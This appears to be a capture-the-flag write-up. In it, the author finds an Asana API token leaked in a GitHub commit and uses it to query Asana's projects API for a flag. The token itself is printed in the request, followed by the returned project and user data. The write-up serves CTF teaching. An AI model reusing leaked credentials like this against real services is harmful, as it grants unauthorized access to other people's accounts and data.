Rating:
I started by looking in the security evaluation workflow at https://github.com/keebersecuritygroup/security-evaluation-workflow. We see the commit here with an Asana secret: https://github.com/keebersecuritygroup/security-evaluation-workflow/commit/e76da63337cfabb12ea127af3f86168e9dd08428
Asana is a collaboration tool, so makes sense that you wouldn't want this to be leaked online. I determined that I should go to the Asana API docs and headed to https://developers.asana.com/docs/projects. I know the cool kids use Linux to send requests to APIs, but I use reqbin.com :)
Anyways, I sent my request to the projects API like this:
```
GET /api/1.0/projects/1202152372766205 HTTP/1.1
Authorization: Bearer 1/1202152286661684:f136d320deefe730f6c71a91b2e4f7b1
Host: app.asana.com
Accept: application/json
```
And I find this!
```
{
"data": [{
"gid": "1202152372766205",
"name": "Penetration Tests",
"resource_type": "project"
}, {
"gid": "1202152393079570",
"name": "testing jeffy boi",
"resource_type": "project"
}, {
"gid": "1146735861322697",
"name": "Sample Project",
"resource_type": "project"
}, {
"gid": "1202202018838998",
"name": "Work Requests",
"resource_type": "project"
}, {
"gid": "1202202259907954",
"name": "Demandes informatiques",
"resource_type": "project"
}, {
"gid": "1202205585331206",
"name": "dw",
"resource_type": "project"
}, {
"gid": "1202206540231288",
"name": "IT requests",
"resource_type": "project"
}, {
"gid": "1202206499728568",
"name": "1",
"resource_type": "project"
}]
}
```
I fetched the endpoint shown in https://developers.asana.com/docs/get-a-project with the penetration tests gid, and see this:
```
{
"data": {
"gid": "1202152372766205",
"archived": false,
"color": "dark-red",
"completed": false,
"completed_at": null,
"created_at": "2022-04-20T02:44:40.333Z",
"current_status": {
"gid": "1202152372766224",
"author": {
"gid": "1202152286661684",
"name": "flag{49305a2a9dcc503cb2b1fdeef8a7ac04}",
"resource_type": "user"
},
"color": "yellow",
"created_at": "2022-04-20T02:48:39.958Z",
"created_by": {
"gid": "1202152286661684",
"name": "flag{49305a2a9dcc503cb2b1fdeef8a7ac04}",
"resource_type": "user"
},
"modified_at": "2022-04-20T02:48:39.958Z",
"resource_type": "project_status",
"text": "Summary\n",
"title": "Status Update - Apr 19"
},
"current_status_update": {
"gid": "1202152372766224",
"resource_type": "status_update",
"resource_subtype": "project_status_update",
"title": "Status Update - Apr 19"
},
"custom_fields": [],
"default_view": "board",
"due_on": null,
"due_date": null,
"followers": [{
"gid": "1202152286661684",
"name": "flag{49305a2a9dcc503cb2b1fdeef8a7ac04}",
"resource_type": "user"
}, {
"gid": "1202152333653279",
"name": "[email protected]",
"resource_type": "user"
}, {
"gid": "1202152333696323",
"name": "[email protected]",
"resource_type": "user"
}, {
"gid": "1202152333724211",
"name": "Stefan Atkison",
"resource_type": "user"
}, {
"gid": "1202152333756260",
"name": "[email protected]",
"resource_type": "user"
}],
"is_template": false,
"members": [{
"gid": "1202152333653279",
"name": "[email protected]",
"resource_type": "user"
}, {
"gid": "1202152333696323",
"name": "[email protected]",
"resource_type": "user"
}, {
"gid": "1202152333724211",
"name": "Stefan Atkison",
"resource_type": "user"
}, {
"gid": "1202152333756260",
"name": "[email protected]",
"resource_type": "user"
}, {
"gid": "1202152286661684",
"name": "flag{49305a2a9dcc503cb2b1fdeef8a7ac04}",
"resource_type": "user"
}],
"modified_at": "2022-04-20T03:47:12.962Z",
"name": "Penetration Tests",
"notes": "",
"owner": {
"gid": "1202152286661684",
"name": "flag{49305a2a9dcc503cb2b1fdeef8a7ac04}",
"resource_type": "user"
},
"permalink_url": "https://app.asana.com/0/1202152372766205/1202152372766205",
"public": true,
"resource_type": "project",
"start_on": null,
"team": {
"gid": "1202152372710258",
"name": "IT",
"resource_type": "team"
},
"workspace": {
"gid": "1202152372710256",
"name": "IT",
"resource_type": "workspace"
}
}
}
```
Our flag is `flag{49305a2a9dcc503cb2b1fdeef8a7ac04}` - neat :)
